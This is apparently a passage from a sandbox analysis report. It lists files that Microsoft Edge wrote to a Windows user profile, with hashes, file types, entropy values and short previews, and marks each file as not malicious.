SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c69ccc4c-a6e8-47db-9d22-045da234bbe2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\de1ee2c2-9482-4da0-913f-afbed521b8a0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	28366
Entropy (8bit):	5.556784044621286
Encrypted:	false
SSDEEP:	768:J0U6/g7pLGLP9gWPk2fJs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVcdl86rwFp8tuZ:J0U6/scP9gWPk2fJsu1jat38/It2
MD5:	A6C69A43BE59221F37A203CD5A2AE655
SHA1:	8172417E94BBE1F2C9EF5E78DECF93DF175E3B3D
SHA-256:	C47F9BAE7E146D63B40C48D7272F98A608F46BEBD5E72494A6F1C9A2EF623199
SHA-512:	B2E3CBCBD3A9A6757E1C8F9C3E3FEDBB54DEEF030028D14E6566FEEF622AA06D770B4837142C62465667129BF12B4AC9800FF7F1A3713E65A09F5B88545BFF2F
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e69a1a62-e304-4365-adaa-4b4a4ce134b1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	38627
Entropy (8bit):	5.554330519900717
Encrypted:	false
SSDEEP:	768:J9+6pg7pLGLPCgWPk2f8s8F1+UoAYDCx9Tuqh0VfUC9xbog/OV3dln6rwHwAPDqf:J9+6pscPCgWPk2f8su1jay3n/HwYGNt3
MD5:	2AEA67C855199990935EE54F9149BD25
SHA1:	5913B9BAEF22E0E57E6A4E51B2708D4184901936
SHA-256:	D1D4ED6E01550666A7042A589FE2DB1487E21B7126C070BE3353174B0232139D
SHA-512:	73032795A17116E0C07E9A3C856B1A626EBB5BAD1B4767618031D5F09622AE1075FCAD3CD4B8015E014789FDF617BD8677513592BE90AD5A674B8C3F29BCDAA5
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377353271011156","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377353271011156","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ed509262-a3d7-48d4-9895-b65f9722330f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.1026088328902413
Encrypted:	false
SSDEEP:	12:+yzzyz0spEjVl/PnnnnnnnnnnnvoQ/Eou:+yzzyzxoPnnnnnnnnnnnv1j
MD5:	80A03ED1ABE0C19FEFBC77FFAC4CAABC
SHA1:	FBA69B00D702B4A37D49DAA742E5351BC042D54A
SHA-256:	90EDDE579E5DEF19CD97FE0BA57956D7230590CFED4F0167ECE0EC283630BB02
SHA-512:	371BCC2D98F8E2C341F44C1159577139B082BA1471DB0791F2A718F3AB9A5254F5F976CEB5CBC72B9C0DDF445FF409824A50106BD15E26025E9009CAFF723AEB
Malicious:	false
Preview:	..-.............M..........5.....XE6.:....G.f....-.............M..........5.....XE6.:....G.f..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8901222407169516
Encrypted:	false
SSDEEP:	384:MqkkpWt5pDX7Ej75wv/YrRIm1r3v82yJUyOuyhySOyBxysy:ApEPW
MD5:	0608289FEF652209466650F61A7C301C
SHA1:	0EFD5FAD55D541A7ED9C1683340C9A8E32E90DB4
SHA-256:	86AD101D3B5A74A6FCC3A4803804E94005D86F7FA818B3E821BBE66D568ECE71
SHA-512:	AA487B62C268D9D13D144709406602DE25D5F381944722A046FAAEAC4CCC310512BABB9E2C8ACC1A84618F281AA5738EECCAB79CF17388445C0730A8B0494534
Malicious:	false
Preview:	7....-...........XE6.:...,\...n..........XE6.:...^.J.~.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	485
Entropy (8bit):	4.024751882001218
Encrypted:	false
SSDEEP:	6:/XntM+dll3sedhO38WrOuuuuuuuuuuEj5ill1b9bwgtjwsedhO2d:lllc8zWrOuuuuuuuuuuEjMllcglZ89d
MD5:	DAEC0C18D799D1BCACEF71D507345231
SHA1:	D483BAB9B5ACE3F91E45894C622673D05F41F97B
SHA-256:	6D12F3D3C38D09D5AFDBCEBBEAA851EE25BD0A0C4FB44CBDD7B83821A4FD502C
SHA-512:	52F62DA06E9ADED1BA6A3FF4BB37DFD89730BB908220ED43A8CDFBBB486F96A39E329143E2FA784A36C9F6D0898F4B094E001D12095258A406377E2D458D5F51
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1....0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................;...............#38_h.......6.Z..W.F.....Z6>.....Z6>..........V.e................V.e................A.B+0................39_config..........6.....n ...1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.261721161553632
Encrypted:	false
SSDEEP:	6:HMHH3AQL+q2PCHhJ23oH+TcwtfrK+IFUt8YMJF+SG1Zmw+YM3SQLVkwOCHhJ23oq:sHHwQyvBYeb23FUt83CSg/+33SQR56Yq
MD5:	682F5777A94783143999C4C9B45C8A8E
SHA1:	49B69E498CB4E7EABA7D94209F3030AA1B34F226
SHA-256:	ED9436B9D74E8F11E705B2AFDD0FBBAC33547A2608E4AC0D7CAB8BAFAC9D39CA
SHA-512:	B3CC4C64D539478494A517DA533D23CD27957A90A13AB5C664CD11AAB18B8CAD8902FE805D0F2AF703834EA5B25C235EBD78CAB0AE94AE89E3D8E5AC5BCB5F08
Malicious:	false
Preview:	2024/11/29-06:27:52.127 d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/29-06:27:52.128 d18 Recovering log #3.2024/11/29-06:27:52.129 d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.261721161553632
Encrypted:	false
SSDEEP:	6:HMHH3AQL+q2PCHhJ23oH+TcwtfrK+IFUt8YMJF+SG1Zmw+YM3SQLVkwOCHhJ23oq:sHHwQyvBYeb23FUt83CSg/+33SQR56Yq
MD5:	682F5777A94783143999C4C9B45C8A8E
SHA1:	49B69E498CB4E7EABA7D94209F3030AA1B34F226
SHA-256:	ED9436B9D74E8F11E705B2AFDD0FBBAC33547A2608E4AC0D7CAB8BAFAC9D39CA
SHA-512:	B3CC4C64D539478494A517DA533D23CD27957A90A13AB5C664CD11AAB18B8CAD8902FE805D0F2AF703834EA5B25C235EBD78CAB0AE94AE89E3D8E5AC5BCB5F08
Malicious:	false
Preview:	2024/11/29-06:27:52.127 d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/29-06:27:52.128 d18 Recovering log #3.2024/11/29-06:27:52.129 d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	753
Entropy (8bit):	4.037333775091125
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
MD5:	C5675C35B320A0898802E1ECFD3476E8
SHA1:	B6CA1C2EE1340662A7B495778416988006748327
SHA-256:	8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
SHA-512:	DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.223605993284996
Encrypted:	false
SSDEEP:	6:HM9HwQL+q2PCHhJ23oH+TcwtfrzAdIFUt8YM9HwG1Zmw+YMDF+NAQLVkwOCHhJ2a:saQyvBYeb9FUt83ag/+3DF+NAQR56Ye+
MD5:	B338F61AC4A8B47CD02B3602846B1DC1
SHA1:	9D7DF581A01472A5A24AB2E5EEDD1950A01B86AD
SHA-256:	693C0212756EFBAEF757484AA476DD78106BEAA73D296DF15611AC7894A2D027
SHA-512:	E01BECC52649A581FD2131F9260367310CDBA1F8A40315274F845A1639A10039F0031C86B0A35E55B49D4F344F5E0D2CBE73114653A06431C9CA14FDA83AFECA
Malicious:	false
Preview:	2024/11/29-06:27:52.121 d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/29-06:27:52.121 d18 Recovering log #3.2024/11/29-06:27:52.122 d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.223605993284996
Encrypted:	false
SSDEEP:	6:HM9HwQL+q2PCHhJ23oH+TcwtfrzAdIFUt8YM9HwG1Zmw+YMDF+NAQLVkwOCHhJ2a:saQyvBYeb9FUt83ag/+3DF+NAQR56Ye+
MD5:	B338F61AC4A8B47CD02B3602846B1DC1
SHA1:	9D7DF581A01472A5A24AB2E5EEDD1950A01B86AD
SHA-256:	693C0212756EFBAEF757484AA476DD78106BEAA73D296DF15611AC7894A2D027
SHA-512:	E01BECC52649A581FD2131F9260367310CDBA1F8A40315274F845A1639A10039F0031C86B0A35E55B49D4F344F5E0D2CBE73114653A06431C9CA14FDA83AFECA
Malicious:	false
Preview:	2024/11/29-06:27:52.121 d18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/29-06:27:52.121 d18 Recovering log #3.2024/11/29-06:27:52.122 d18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2a500.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2a510.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2a687.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090554181423916
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k9CLmZtwtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynmtGhOxqQoRTuiVIos
MD5:	E4E8A48444B9183ECE0BC5521BA5C327
SHA1:	CEBA60483EF6ED4ABF7383E24B843591FE3FD03F
SHA-256:	D0C59448AA6D10042B1B358AF65DD427DB2DFD86E520A2A2D24E2AA0CBC519FD
SHA-512:	6EB4FE72DF38573C08B9B3FF3A68F544B89C10978C12027B7BD90D43408891A35042937A41DA24907979D4BFFE78B4AED104FE799882EEAD976EA76C48D6B491
Malicious:	false
